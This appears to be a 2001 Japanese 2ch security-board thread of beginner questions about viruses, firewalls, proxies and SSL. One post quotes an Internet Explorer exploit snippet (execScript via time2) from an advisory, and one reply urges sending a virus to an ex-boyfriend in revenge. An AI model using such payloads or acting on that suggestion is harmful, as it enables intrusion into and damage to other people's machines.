武道版のスレッドにいたずら？で出されておりまして、クリック
してしまったら、とても怖い思いをしてしまいました。いまのところ
なんともないのですが、いったいなんだったのでしょう？
あと、２ＣＨで紹介されているエクスプローラーの修正プログラムは
インストールしたほうがいいんですか？？？？？わからん

>>153
■godhandウィルスとかいうの踏んじゃった■
http://pc.2ch.net/test/read.cgi/sec/1008511723/l50

http://pc.2ch.net/test/read.cgi/sec/1008081334/l50

修正プログラムはこれとは関係なく導入しろ。

ありがとうございました。要約するとただのいたずらでなんとも
ないってことですよね？ね？ﾎｯ
修正プログラムはとりあえずやってみます。できるかなあ（←初心者）

hamster.doc.pifなる添付ファイルとテキストの2通がついた
メールがきました。ウィルスですか？

先日ダウンロードしたノートン先生にはひっかからなかったのですが・・
好奇心でテキストだけ開きました。
アドバイスお願いします

>>156
ウイルスです
ノートン先生は買ってきなさい

>>157
ありがとうございます。
買ったものとダウンロードしたものとでは
どのぐらい違うのでしょうか？よろしくお願いいたします。

>>158
ダウンロード販売のものか？
だったら大丈夫だけどフリーの奴はサポートしてくれないぞ
ウイルス定義も更新できないし

便乗させて下さい。
NIS2001体験版をダウンロードしようと思ってたのですが、
ウィルス定義を更新できないのでしょうか。

>>160
体験版ですべてまかなえるならシマンテックは倒産しますよ

ノートンよりウイルスバスターでは？
とりあえずよんどけば安心。
http://www.puchiwara.com/hacking/

>>162
俺はNorton派だな

>>162
サイトでは1500円だけど、通販では1600円だったね。
でもためになりそう。

IE6&5.5は危険です。とこの板の上にかいてますが。
5.0はどうなんでしょうか？

>>165
5.0はサポート対象外だよ
5.5にしな

Eudora Ver4.3Jってどう？このヴァージョンは無料なんでしょ。

>>167
どう？ って何が？

Ｍａｃ使ってるんですが、ハムスターとかいウィルスを送られたみたい
なんですが、やばいんでしょうか？winだけに対してのものなのでしょうか、
このウィルスは？と、言うかウィルスかどうかもわからないんですが。

>>166

どうもありがとう御座いました。

>>169
サブジェクトがRe:だけ、サイズが41K前後ならまずBadTransという
ウイルス。Macは感染しないが、捨てちまうが吉。

ネットにつなげると、Ｃ．WINDOWS．EXPLORER．EXEがやってきます。
今のところ毎回ノートン先生でブロックしていますが、こいつは本物の
WINDOWS．EXPLORERでしょうか？それともトロイでしょうか？
ちなみにIE5.5を利用していますが、修正ずみで、バージョン情報は
SP2；Q312461；Q313675になっています。
誰か教えてください。

以下の環境ですが

　　　　　　　desk　2000　　　　　　　note　98
　　　　　　　ＺＡ有り　　　　　　　　ＺＡ無し
adslーーーーーnic　１
ICSで接続共有
　　　　　　　nic　２ーーーーーーーーーnic　３
　　　　　　　ＩＥ６　　　　 ↑　　　ＩＥ６
　　　　　　 　　 ↑
　　　　　　　　　　　　　 ＬＡＮ

ＺＡを外すとノートからインターネットへアクセスできるの
ですが、入れるとブロックされてしまいます。
ファイルのやりとりはＺＡ有りでもできます。
設定をいろいろいじってみましたが、繋がりません。
ご存じの方　設定方法をお教え下さい。

>173
ＺＡ有り　無しは　インストールしているかいないかです。
よろしくおねがいします。

商品説明欄に臆面も無く「win Me インストール済みです！」
「これはお買い得です！」等の謳い文句を書きなぐるタワケ出品者が
晒しあげを喰らって逆上！本人降臨して事態は際限無くヒートアップ！
しかしまぁ・・・ＯＳ入れてヤフオクで売るなよ・・・って
呆れるほどのヴァカが晒されてます。失笑注意！（ｗ
http://mentai.2ch.net/test/read.cgi/doll/1008771798/l50

ウイルス（種類問わず）に感染した時の症状などを
語っているスレを教えて。

http://ams.milkcafe.to/Asunaro/Program/Burakura/index.html

ウイルス情報教えてください。
画面が真っ黒になって、真ん中に
EnterCURRENTpassword:
というメッセージが出てきます。
再起動してもこの画面になります。
パスワードが分からず、とりあえずEnterキーを押すと
3回目で上記メッセージのあとに顔らしきものが出てきて、
その表情は笑っています。
で、そのまま動かず。です。
これってウイルス？
知っている方、教えてください。

ノートンのインターネットセキュリティをインストールしたんですけど

「ｱﾄﾞﾚｽ 202.210.151.123 からの不正侵入の試みを規則 Senna Spy ﾄﾛｲの木馬のﾃﾞﾌｫﾙﾄ遮断 によって検出しました｡
以降のｱｸｾｽを 30 分間遮断しました｡」

って画面が出たんですけど(同じ相手で２回)こういう場合はどう対処すればいいんですか？
まるっきり初心者でわかりません。
どなたか教えて下さい。

>>179
気にしなくていいよ。

>>180
返答ありがとう御座います。
でも、ノートンは最近入れたんですけど
それ以前は侵入されてたんですかね？

この質問、いつまでたっても無くならないね…
SSTPっていうプロトコルがあってね。
デスクトップマスコットにメッセージを送ってるんですよ。
それだけなんです。

それ、特定のwebpageを見に行ったときに起こるでしょ？

どなたかSOCKSの使い方を教えて下さい。
無料で使えるものなんですか？

>>183
UNIXで個人使用なら無料だよ。Win版は有料。
機能が豊富なので使い方はgoogleで探しなさい。

>>184
どうもありがとうございます！
SOCKSのサイトに行っても英語で読めないし、MXのスレでも串スレでも
放置だし、本当に謎でした。
最後に一つだけ教えて下さい！
SOCKSを使うには、それなりのスキルは必要ですか？

>>185
元がNEC開発なのでSOCKSのサイトは日本語表示できるよ。読めなかったけど。
それなりの判断が難しいけど、WEBでそれなりに情報を検索できて、
コンソールで設定するのにそれなりに慣れていれば。
http://www.permeo.com/japanese/japanese.htm
http://www.tac.tsukuba.ac.jp/~hiromi/socks5.html

>>186
あー、わざわざありがとうございます！
でも、すぐに使えるようなものではないんですね･･･。
よーし！教えていただいたサイトを参考に、
ちょっと勉強してみます。

PCのCドライブの中に「fix_nimuda」っていうファイルが
あるんですけど･･･････；
アイコンを選択したら「fix_nimuda.exe」って出て
更新日時が今年の9月22日、サイズが88KBって
なってるんです･･･････なんかヤバイ匂いぷんぷん
なんですが、削除しようとすると
「fix_nimuda.exeはプログラムです。
削除すると編集できなくなるドキュメントがある可能性があります」
って出るんです(泣)。これってなに？
オンラインでウイルス検索しても出てきたことなかったのに；
ちなみにIE5から、パッチ当てたりの作業は
9月の下旬か10月の上旬あたりにやった記憶があります。

他のとこにも書いたのですが、初心者なので教えてください。
ニュー速板で間違って「ついにビンラディン捕獲！！・・・」
ってやつ踏んじゃったんですけれど、これって話題になってるセキュリティホールのこといってるんですか？
具体的にどうやばいんでしょうか？踏んだ後にセキュリティ関係のアップデートしても意味ないのですか？
詳しいかたお願いします。
電源切ってれば勝手に外からコントロールされることもないのかな？

>>188
3ヵ月後には
「FixBadtr.exeっていうファイルがあるんですけど」
と言い出すのに500ｳｫﾝ

Javaのセキュリティ機能としてデータを暗号化するという
話を聞いた事あるのですが、これはSSLの暗号化とは違うの
でしょうか？どなたか、Javaのセキュリティの特徴を詳しく
ご存知の方、どうか教えてください。
よろしくお願いします。

>>189
＞他のとこにも書いたのですが
マナー違反ですよ。

>>192
すみません。あせってたもので・・。

何故かマイクロソフト関連のホムペにとべないんですが．．．
今もIEの件でここの板に貼ってあるリンクからとべないし、
エイジオブエンパイアのデモDLしようとした時もとべないし．．．

↑ページを表示できません、と出ます。

今ＺＡを見たら、「×から△へのルートトラフィックをブロックしました。」
と出たんですが、ルートトラフィックとは何でしょう？×と△は自分のＩＰでは
ありません。

>>194
飛べないとはどういう風に飛べないの？
OSは？ IEのバージョンは？
回線は混み合ってないか？

>>197
ウィンドウズME・IE5,5です。
例えばここの板のウィンドウズセキュリティ情報をクリックすると、
始めに「ページを表示出来ません。」と出て、最後に「サーバーが見つからないか、DNS エラーです。」と出ます。
一応その画面に書いてあることは試したのですが結果は変わらずでした。
またエイジオブエンパイアのページは夏ごろからとべてませんから、回線以外の問題ではないかと思います。
ちなみにフレッツADSL使ってます。

>>198
夏から一回もMSのサイトに入れないの？

>>198
今まで一度もマイクロソフトのページには行けたことがないのかい？
それとも今日だけ？

たぶんもう少し時間を置いたらいけると思う

>>199
ええ。今も試してみましたがやはり無理でした。

>>201
MSのサイトだけ入れないの？
なんかファイヤーウォールソフト使ってる？

>>202
ファイヤーウォールソフトとは何ですか？

>>203
不正侵入等を防ぐものなんだけど
知らないっつうことは使ってないね・・・。

トロイの木馬型に感染したのでﾄﾚﾝﾄﾞﾏｲｸﾛの解決方法でやって
みたのですが駆除の確認方法がイマイチわかりません、また
ツールのログの「III.」の項目を参照してくださいと記載せれて
いますがやり方がわかりません。すいません教えてください。

>>205
なんのトロイに感染したのかかかなきゃ何も教えられない。

友人から「sulfnbk.exe」というウィルスが行ったと思うから削除するようにと
メールが来たので、検索したのですが随分前からあるみたいなのです。
これって削除しても良いのでしょうか？

>>189
＞他のとこにも書いたのですが
マナー違反ですよ。

>>208
教えてやれよ。

>>207
http://www.ipa.go.jp/security/topics/alert130530.html

>>207
googleで検索してみて。
デマ情報らしいよ。

>>210
>>211
ありがとうございます。
これから気をつけます。

>>206

W32/BADTRANS-Bです

ＮＩＳからの警告
リモートシステムがこのＰＣにアクセスしようとしています
ってのがさっきから頻繁に出て怖いんですけど。

>>2で紹介されている
Shields UP ! の日本語解説サイト http://www.upsizing.co.jp/news/report0426.htm
とかでチェックしても特に問題はなさそうなんですが。
このまま接続続けててもいいんでしょうか・・・？

>>213
http://www.trendmicro.co.jp/esolution/solutionDetail.asp?solutionId=3368
これのどこが分からないのだ？

>>213
http://a500.g.akamai.net/7/1776/484/00003/inet.trendmicro.co.jp/solutionfile/3378readme.txt
ここに書いてある通りだが？

　

重複スレ立てちゃったのでこっちをあげ

昨日寝る前にPC電源落とそうとしたら　３人の接続者がいます
５つのFILEを開いています
シャトダウンするとこれらのFILEが消える可能性が有りますと
出ました　WINMXやってました　でも交換も終わり
接続者誰も　いないはずなんですが　TT
この手の知識無知なんですが　誰かつないできてるひとが
いるのですか？教えてください

>>219　WinMXをやめることです。

>>219
ファイルの移動が終わるまで待ってくりょ

>>219
WinMXをやってる馬鹿のセキュリティなんてしらねーな
びびってなさいってこった

やはり　問題はそこですか
IPアドレス漏れまくりで　その手の方は　簡単に
こちらに　入り込んで　色々できるのですか？
ありがとうございました

「zippsw」ってのが欲しいんですが、どこにあるとですか？

>>224
あやしいものは自分で探してね

>>224
http://www.google.com/search?hl=ja&q=zippsw&lr=lang_ja

今日ウィルスらしきメールが届きました。
件名は無し、添付ファイルは「GPNILIGP.EXE」、容量32kbです。
ヘッダの一部です。
content-Type: multipart/mixed; boundary="--VEYBOLMZCX6NKXAFWD"
X-UIDL: 799887767889885F868526585F999674265F255
Status: U
----VEYBOLMZCX6NKXAFWD
Content-Type: text/plain; charset="us-ascii"
----VEYBOLMZCX6NKXAFWD
Content-Type: application/octet-stream; name="GPNILIGP.EXE"
Content-Transfer-Encoding: base64
Content-Disposition: attachment; filename="GPNILIGP.EXE"

ぐぐる、IPAのデータベースをファイル名で検索しましたがヒット無し、
まだファイルを開いていないせいか、オンラインスキャンでもヒット無しです。
BadTrans.Bと一緒に届いたのですが、なんのウィルスかわかりますか。

>>227
なんでオンラインスキャンでやるの？
製品版持ってないなら買わなきゃだめだよ

>>226
いや、検索くらいは既にやったんですが、検索結果の二件とも
入手難しいんでゲス、情けなや

>>229　お前はまだ甘い。使わなくてよし。

>>230
正論ですね、逝ってきます

>>228
ちょうどマカフィーの期限が切れたため、
製品版はノートン先生を買ってきたばかりでまだ説明書は全部目を通してません。
相手先にまず感染のことを教えてあげたかったのですが、
BadTrans.Bと何かに感染しているのだけ連絡して
自分の方はまずインストールだけしてしまおうと思います。
ありがとうございました。

>>219
WinMX は関係ない
netbios だ

XPです。
UPnPのポートを閉じたいのですがどうやればいいのですか？
ファイアーウォールはsygateです。
UPnPの削除方法も知りたいです。

>>234

ノートン以外でいい安置ウイルスソフトって
ウイルスバスター以外ないですか

>>236
ないと思われ

私は普段プロキシをつけて（？）ネットサーフィンしてます。
その方が安全だと聞いたからです。
ところが最近、普通にプロキシつけているだけだと、その前にどこのプロバから
そのプロキシに変えたかわかると言われました。
多重串にしてないと駄目だと。（多重串についてはよくわかりませんでした）
そんな事って調べてわかるのですか？
スレ違いかもしれませんが、普通の人に調べられるのか否かだけ教えて下さい。

>>238
ネットサーフィンぐらいでプロキシは必要ないっすよ
その前に必要なのはファイヤーウォールとウイルス対策

差出人、送信メールが空白で
CFLNGNCF.EXEとかONDPGKON.EXEという添付ファイルのメールが最近来ます。
（ﾊﾞｯﾄﾞﾄﾗﾝｽも来ますが）
このメールは差出人の特定、故意の送信なのかの区別は付きませんか？
このウイルスについて詳しく載っているところも教えて下さい。

>>240
ヘッダを見ればある程度は分かるかもね
ウイルスについてはシマンテックのサイトで

>>241
添付ファイル名で検索しても引っかからないので、、
ヘッダには送信元プロバイダしか載ってません、、

>>238
そのまえに
あなたが何をしようとしていて誰に駄目だと言われたのか
小一時間語って欲しいです（ｗ
やましいことがなければプロバイダ串で十分

>>242
そのexeファイルがウイルスだと思う根拠は何？
ウイルスチェックしないでウイルスだと分かったの？

sygateを使っているのですが、Tiny Trojan Trapも併用したほうが
いいですか？

どうみてもｳｲﾙｽだと思うが。

>>240
hybrisだと思われ。ｼﾏﾝﾃｸで検索するよろし。

ここ数日流行ってるpingの嵐はなんなのでしょか。
何かの亜種？

汚染を除去しました。

>>248
　↑
踏んだらあかん、IP抜き＆強制メール送信＆ブラクラ

>>249
どうもです。
ちなみにパソコンがフリーズしましたので、電源を切りました。

初心者スレのPart4,5を読ませていただいたのですが、
分からなかったので、教えていただきたいのですが。。
ＭＡＣ用のファイアウォールソフトは、どれがいいのでしょうか？
私は、ノートンしかしらないのです。。
BlackIceやZoneは、winしかないみたいですし。。
フリーウェアもあるのでしょうか。。
お願い申し上げます。

>>251
ここにあるよ。
http://www.act2.co.jp/x_act2main/X_PRD/x_intego/NetBarrier/product/
これは”ネットバリア”というソフト。

>252さん
ありががとうございます。
スペックを言い忘れていたのに、大変、ありがとうございました。
早速、見て調べてみます。
ちなみに、私のＭＡＣはヘボですが、一応お伝えしておきます。
iMAC G3 233　OS8.5。
いわゆる、初代iMACのバージョン変えのやつです。

なんか来たよぅ！
今ＯＥでメール受信したら、送信者が確か”ｺ^"で、
件名が”ＲＥ：（文字化け）”、添付ファイルありの
ｱﾔｼｲもんが来た！当方ＩＥ６でプレビューも切って
あったので速攻削除しましたが、なんだったんだろ〜？
いや、初めてこんなｱﾔｼｲのが届いたんでちょっと
ドキドキしたんですけど、プロパティ見ても良かったのかなぁ？
こんな日にそんなｱﾔｼｲもんが届くなんて・・・。
たぶんウィルスでしょ？（ちょっと嬉しい）

>>253
…それ、私も持ってます。
iMac(G3 233MHz) Rev.B Mac OS 9.1。
ちなみに私はノートンですが、別段不都合を感じたことはないですね。
もっともそれはADSLを導入する前だったのですが。

>255さん
同じＰＣなんですね。
ノートンでも大丈夫なんですね。
もっとも、私は、ＯＳ、ヘボヘボですが。。
私も、ＡＤＳＬにしたのをきっかけに、ＦＷ導入を考えています。
やっぱり、ＯＳはVersionUpしないとだめなのでしょうね。。

>>256
私も当初はMac OS Xを導入するつもりだったのですが、旧iBookを
新品で買ってしまいまして、そちらに導入してしまいました。
とりあえず9.Xの最終Ver.(9.2.2)にはしていません。

>>256
とりあえず8.6にしたほうがいいんでないかい？
無料でできるし

>>254
感染しちゃってるかもな
その書き方だと

>257さん
やっぱり、少しでもＯＳバージョンアップするようにしてみます。
ありがとうございました。
ところで、ＭＡＣでも使用できるＦＷで、
ZoneAlarmのようなフリーウェアはあるでしょうか？

>>260
さんざん探したがなかったような記憶あり

>258さん
そうしてみます。
ありがとうございましたです。

>261さん
やっぱり、難しいのですね。。
私もまた探してみますです。
もし分かったら、こちらのどこかでアップさせていただきます。
私ごときが見つけられるかどうか分からないですけど。。
でも、ありがとうございました。

>>259
そんな気もします。
自分、ＶＢ２００２体験板（後残り７日）入れてますが、
年が明けたらいいかげん製品を買おうかと
思っとります。

>>264
感染して自分が加害者になることをしらないのか？
それで訴訟が起こされたこともあるんだが

>>265
オス。
ですから、製品版を購入すると言っております。
すいません。

【ウィルス】Xmasウィルスに注意して
http://choco.2ch.net/test/read.cgi/news7/1009233792/l50

（News速報板より）

＞＞２６７
マルチかよっ！

>>268
三村かよっ！

すいません。ここには今、始めて来た超初心者です。質問させてください。

あるネット通販店で、セキュリティにSSLを使用しているという所を利用したのですが、
カード情報送信フォームで、ネスケ4.7では「暗号化されていません」と出るんです。

その店に問い合わせた所、「うちはSLLを使用しているので安全」という返事をもらったのですが
SSLによる暗号化は、ネスケの鍵アイコンとは関係無いんでしょうか？

もしかしたら、すごく厨な質問かもしれませんが、よろしくお願いいたします。
カード情報送信しちゃったんで、恐ろしくて眠れません。

>>270
あるよ
プロトコルがhttpsになってるのと鍵マークが出るのを確認してくれ

>271

レスありがとうございます。
今、見てきましたが、ネスケでは、鍵マークが出なくて、httpのままみたいです。
IEでは、httpsになっているみたいですが。

ちなみに、この店なんですけど。
ttp://www.e-hobby.co.jp/

メールでの問い合わせには、下記の返事をもらいました。

-------------------------------------------------------
お問い合せの件でございますが、新システムでのクレジット決済はオ
ンライン決済をおこなっております。このオンライン決済は【お客
様】-【システム】間、【システム】-【クレジットカード会社】間は
SSLのセキュリティを行っており、今現在もっとも安全なオンライン
システムです。
-------------------------------------------------------------------

Internet Explorer4.5/Netscape Communicator 4.0.8 以上でご覧ください
という事のようですが…

騙されてますか？おれ。

>>272
それは単にフレームでURL欄が変わってないのを見てるのでは？
レジでお会計の画面はちゃんと暗号化されてるぞ

もういちど試してみましたが、フレームを新しいウインドウで開くと
そこは、httpsの鍵マークありになっている様です。

トップからフレームのままで買い物する場合には、前の書きこみの
通りになります。

これは、システムの不備という事でしょうか。
フレームのままで買い物するとやっぱりヤバイですか？

>273

つまり、それで大丈夫という事ですか〜。
なんとも厨ですいません。

>>275
大丈夫だ

もしそれが元でクレジットカードが悪用されたらそのショップを訴えろ

>276

お騒がせいたしました。安心して眠れます。

それでは、名無しに戻ります。
ありがとうございました。

ちょっと質問させてください。
グリーティングカードからウィルスって感染する？
添付ファイルはないんだが。
送られてきたメールが感染してるかどうかってわからないの？

>>278
ウイルス対策ソフトいれてないとわからんですよ
明日買ってきなさい

知らない人からグリーティングカードが送られてきたんだけど、
開封せずに削除の方向がいいよね？

こんなメールが来たんですけど、私が（私のPCが）どっかにメールしまくってるんでしょうか？

Subject: Delivery Status Notification
From: Mail Delivery Service <[email protected]>
Date: Mon, 24 Dec 2001 22:24:46 +0100

- These recipients of your message have been processed by the mail server:

[email protected]; Action: Failed; Status: 5.2.2 (mailbox full)
[email protected]; Action: Failed; Status: 5.2.2 (mailbox full)

Reporting-MTA: dns; mail.libertysurf.net
Received-from-MTA: dns; mx.port.ru (194.78.102.155)
Arrival-Date: Mon, 24 Dec 2001 22:24:45 +0100

Final-Recipient: rfc822; [email protected]
Action: Failed
Status: 5.2.2 (mailbox full)

Final-Recipient: rfc822; [email protected]
Action: Failed
Status: 5.2.2 (mailbox full)

添付ファイルは　ATT91C5.eml　です。

>>280
郵便ポストに入ってるピンクチラシって普通読まずに捨てるわな。

>>281
メールしてるかどうかなんて使ってる本人が一番よく知ってるはずだが。

>>281
メアド間違ったんじゃないの？

＞282
すみません初心者なので。
勝手にメールするようなウィルスがあるように聞いたもんで。
私の言っている事おかしいですか？

あのね、質問があります。
メールを開いたとたんにメディアプレイヤーが開くウイルスって分かりますか？
名前を教えて下さい★彡

>>281
あなたがメール送った人のメールボックスの容量に空きがなかったから
送ったメールがそのまま帰ってきただけかも。

>>285
Badtranceでそういう症状があったかも。

Badtransだった・・・

即レスありがとうございます★彡
286、287！

>>284
ウィルスに感染したんじゃないかな？と思うなら、
最初にウィルススキャンするのが普通でしょ。
言ってることはおかしくないけど、やってる事がおかしい。

>>285
http://www.google.co.jp/search?hl=ja&q=%83%81%81%5B%83%8B%82%F0%81%40%8AJ%82%A2%82%BD%81%40%83%81%83f%83B%83A%83v%83%8C%81%5B%83%84%81%5B%82%AA%81%40%8AJ%82%AD%81%40%83E%83C%83%8B%83X&lr=on&btnG=Google+%8C%9F%8D%F5

場違いかもしれないんですが…本当困ってるんでお聞きします。
携帯電話に送信者『@docomo.ne.jp』から変態的なイタズラメールがくるんです。
それだけなら大した事無いのですが、私の名前入りで『〜サンへ』とかなってて
多分、犯人は私の友人の元彼だと思います。
彼女（私の友人）の話だとパソコンを使って送信者のメアドが『@docomo.ne.jp』
になるようにして送ってるみたいと言われたんですが…。
本当にそんなことできるんですか？

>>290
できる

>>290
簡単に出来る。

すいません質問させてください。
プロクシをはずし忘れてWeb上で買い物をしてしまったのですが
その際に入力したクレジットカードの番号や個人情報は
SSLを使ったページでもプロクシのサーバ管理者にわかってしまう
ものなのでしょうか？
よろしくお願いします。

>>293
知らない…

>>294
そうですか・・・
google等で検索しているのですがちょっと見つからなくて。
もうちょっと調べてみます。

>>291
>>292
やっぱり簡単に出来てしまうんですが…。
犯人と思われる彼もそんなにパソコンに関して詳しくないはずなので
多分簡単にできるのかとは思ったのですが。
ものすごい自分がガキっぽい事を考えてるのも承知のうえで
同じ方法で彼に
『〜くんへ　パソコン使って変なメール送るのやめてください』
って仕返ししてやりたいです。きっと彼、『俺って凄い？』とか
思ってイイ気になってると思うと物凄い腹立たしいし…(-_-‖

>>296
そいつのメアドわかってるならウイルス送ってやれ！

>>296
自分のメアドかえればいいじゃん
変な奴は無視したほうがいいぞ

>289
THX
もちろん、スキャンはした上なのです。
ま、スキャンでOKならOKということで落ち着こうと思います。
他人に迷惑を掛けてたら困るな　と思ったもので。
とにかくありがとう。みなさん。

>>296
送信用アカウントの設定ちゃんと確認してからやってね（ｗ
へたにやって、PCメールの本アドばらさないように（ｗ

先程友人から電話で質問されたのですが・・・。
「Returned mail: Host unknown」のメールがきたのですが
知らないアドレスが間違え先になっているとのことです。

出した覚えもないのに「宛先不明ですよ」って来るものなのでしょうか？

>>301
ヘッダを確認してみな
まあほっとけばよい

>>297
携帯電話のメアドは勿論知ってるのですが。普通にその携帯のアドレスから
何食わぬ雰囲気でメール送ってくるから更に腹立つんですが…
>>298
私も始めはそうしようと思ったのですが、彼私の電話番号も知ってるので
メアド変えて、教えないとなると多分今度は電話番号まで変える羽目になるかと。
変な意地張ってると自覚していますが変なヤツの為に何で私が
電話番号まで変えなきゃならないの！？という気持ちもありまして。

>>302
ありがとうございます。
数日前Badtransにやられたばかりとのことで心配だったようなんで・・・。
ほっとくように言っておきます。

>>303
人生相談になってきたのでこの辺で手を引く
他人のごたごたに巻き込まれたくないもんでな

>>304
ヤパリ、、、感染したとき送信した奴の戻りメールぢゃん。。。

>>293
そこらに転がっている匿名串を使ったなら、ご苦労さん。筒抜け。
生兵法は大怪我の基。

>>296
大人のオンナになるには報復なんてやめて、
素直にメールアドレスを受信禁止に入れておきなさい。

>>300
アドレス書き換えが出来る以上何とでもなる。

>>306
なんたら.comとかいう業者（？）宛に出したのが
戻ってきた形になってたらしいんですが・・・
それって過去に見たどっかのHP内のアドレスなんでしょうかね。
それでそこから弾かれるとそういうものが返ってくるのでしょうか？

ん？ってことはそのメールを開いたらまた感染するんですよね。

コンパネのネットワークフォルダにあるNetBEUIとかを削除したら、
セキュリティが上がるん？

>>308
添付付いたままならね。。。パッチ当てて無かったらね。。。
http://pc.2ch.net/test/read.cgi/sec/1008355163/
↑もうだいぶサゲちゃったけど、、、ココ目を通しといて。
ひょっとすると、その業者、バドトランスメル来過ぎてア
ドレス閉じた可能性も有り？？

>>307
そうですか。
どこかの掲示板では大丈夫だと書いてあった記憶があるのですが
どうやら私の勘違いだったようですね。
フォームのメソッドはpostだったのだけど、プロクシのログに残るのかな？
わからん。

>>300
うーん、でも実際今の私の知識じゃ、自分のアドレスばれないようにというか
同じ風に仕返しなんて無理そうです(´-｀ヾ
>>305
申し訳ないですホント。板違いなのにスミマセン。。。
>>307
本当のところ大人のオンナとして割り切れるかどうか、まだ微妙です。
取り合えずメアド変えて、電話にイタズラ来るようならまた考えてみますね。

ってーか、、、まさかキーログ送信の戻りぢゃ無かろう。。。

>>306
ありがとうございます。今「猛威をふるう〜」スレ読んでます。

ところでキーログ送信ってなんでしょうか？
検索してもでてこなかったのですが・・・

こんな方法でやってみそ

http://pc.2ch.net/test/read.cgi/sec/1009218193/l50

自己解決しました。
過去ログあさったらみつかりました。
どうやらプロクシをさしていても大丈夫なようです。

http://developer.netscape.com/docs/manuals/proxy/ProxyUnx/SSL-TUNL.HTM

お騒がせしました。

>>312
いや、元彼とどうのこうのってのはどうでも良くてさ、
周りの迷惑も考えてみてよ。ってだけよ。

Internet Explorer Document.Open() Without Close() Cookie Stealing, File Reading, and Site Spoofing Bug
http://www.securiteam.com/windowsntfocus/6B00L003FU.html
http://www.osioniusx.com/
−−−−−
http://memo.st.ryukoku.ac.jp/archive/200112.month/2396.html
<noscript>
<xml:namespace prefix=t />
<?import namespace=t implementation=#default#time2 />
<t:set id=set1 to=''
attributeName=document.parentWindow.execScript(scr1.innerHTML), set1.outerHTML />
</noscript>

質問です。
教えてくださーい！！
PINGの意味ってなんですか？
それからPINGされると結局どうなるの？
メルアドとかバレるんですかね？
教えてくださいねー♪

>>311
よくわからないのに匿名串を使って何かするのは
免許持ってないﾄﾞｷｭｿが車盗んで高速を逆走するぐらい無謀です（ｗ

>>319
http://www.google.com/search?q=cache:gbQ6bmgQ07A:www.kiu.ne.jp/tech/tools/ping/+ping&hl=ja&lr=lang_ja

>>320
解決した問題に関してレスするのもﾄﾞｷｭﾝだな（ｗ

>>322
ヽ(`Д´)ﾉもう来ねえよ！ｳﾜｧｧﾝ（ｗ

>>323
何かあったら帰ってこいよ。俺はいつでも待ってるぜ（w

２ｃｈに書き込むときに、ZoneAlarmがいろいろと反応（ブロック）
するんですけど、どういう意味か知ってる人教えてください

３２１>
ありがとうございますvvv
でもよくわかんない（死
メルアドがバレるってことじゃないんですよね？

>>326
答えてもらった全部のスレでお礼言ってこい

>>325
ログ読め

>>327
このスレにはなかったので聞きました。
ZoneAlarmスレで解決できました。

c:\program files\xerox\nwwiaフォルダが削除できません
safeモードなら削除できるけど、通常起動すると
また同じフォルダが作られてしまいます。
これってウィルスに感染しているのでしょうか？
一応ウィルスバスターでチェックしたけど無検出でした
どなたか教えてください

マウスの入力が一切効かなくなる+画面が16色しか選べなくなる
この症状何ですか？今キーボードのみでカキコんでんだけど
いい加減疲れてきた・・・。

>>329
アンインストーラーが削除してくれなかったのか？
xerox関連のアプリケーションが動いてるんじゃないのか？
DOSから削除しても消えないか？

>>330
再起動してみなよ

>>332
変らないんだけど。

復元で直った。ヤター！

>>333
セーフモードで起動してないか？
もしくはビデオカードのドライバがこわれてないか？

それにしてもマウスがきかないってことはないな
別のマウスつなげてやってみてくれ

>>335
330=333=334
よって終了。

>>332
>>335
ありがとうございました。原因はよく分らないままですが
とりあえず直りました。

そもそも、なぜセキュ板？

誤爆してほかのスレに書いてました。
こちらでよろしくお願いします。
詳細はこうなんです。

新しいマシンがＸＰproでとりあえずマカを入れた。
ついでゾヌの2.6.362を入れた。
で、マカフィーが嫌いだから、ノートンシステームワークス2002の
アンチウィルスを入れたら、ゾヌのプログラムの接続許可に全て×がついているんです。
マカのときはそんなことなかったのです。
９８でゾヌとアンチウィルス2001を併用しているときも問題なかったです。
ネットなんかはできています。
XPのFWは切っています。
インストール手順はマカをアンイントールしてからノートンを入れました。

3っつが絡んでどこに書いたらいいかわかりませんでした。
過去レスは参照したんですが、見つけられなくて。
教えて君ですみません。よろしくお願いします

>>331
すいません、DOSで削除とはどうするのでしょうか。

使用OSはXPHomeです、削除しようとすると
「ほかの人かプログラムが使用しているので削除できないよ」
みたいな事を言われるので、多分何かのプログラムが持っていて
放してくれないんだと思うんだけど
そのプログラムが特定できないのです。

>>340
XPってDOSモード無かったんだっけ
使ってないから知らんのだが

xeroxといえば印刷関連のプログラムだと思うのだが
それらしきものをインストールしてないか？
ネットワークを介して利用してないか？

>>340
起動ディスクある？

>>339
OS再インスト

アンチウイルスソフトを導入しましたが、本当に効果があるのか不安です｡

色々な環境下で実験してみたいのですが､例えば無害なニセウイルスをメール
に添付して自分に送信して試したいのですがそのようなファイルはあるのでしょうか?

また､実験するつもりですが､｢インターネット接続の共有｣で接続している
親マシン(ルーター)にアンチウイルスソフトを入れて､子マシンからメール
を受信してもウイルス発見の効果はあるのでしょうか。

インターネット-----ケーブルモデム-----ルーターPC(ソフト有り)-----メインPC(ソフト無し)

お勧めのノウハウ技術書探してます。
初心者スレッドに書き込むのはどうかとは思うのですが、一応『リソースキット』や『全機能Bible』は書棚に入っています。（ネットワーク関係の情報が貧弱）
最近内容が複雑怪奇すぎて正直疲れています。
セキュリティ設定ノウハウに関しては無知です。

ネットに接続してると玉に勝手に再起動するのだが
これは攻撃されてるのか？

XPを使っているのですが、Cookieの中にindexと書いてあるDATファイルがあるのですがこれが削除
できません。削除しようとすると（indexを削除できませんほかの人またはプログラム
ファイルによって使用されています）となります。Cookieはすべて削除したいのですが
これは削除できないものまたは、削除してはならないものなのでしょうか？
それとも侵入されたものなのでしょうか。気になるので教えてください
ちなみにパソコンにインストールしているソフトはノートンSECURITYとフォトショップ、
ホームページビルダーです。

>>347
googleで index.dat cookie をキーワードにして検索すれ

zone alarmをアンインストールしたら、
windowsの起動時に文字化けしたエラーメッセージが
表示されるようになってしまいました。
辛うじて vsdata95.vxdという文字だけは確認できます。
どうにかして元に戻したいのですが、
何かアドバイスがあったら教えてください。

>>340
そうか！xerox=ゼロックスか。
どこかのアダルトページに行った時に変なプログラムを
仕掛けられたのだと思い、削除しようとしていました。
ということは、このフォルダはプリンタドライバか何かが
使っているだけで、別に削除する必要は無いということでしょうか。
しかし今のマシではプリンタなどの機器は一切使っていないのに
なぜこんなフォルダができるのでしょうか。

>>341
CドライブのフォーマットをNTFSにしてしまったため
98の起動ディスクでは見れないようです。
XP用の起動ディスクというのがあるのでしょうか。


レス遅れて申し訳ないです

>>345
セキュリティ関連の本も書店に山ほどあるね
とりあえずプロトコルの勉強から始めてみたらどうでしょ？

>>346
んなこたーない

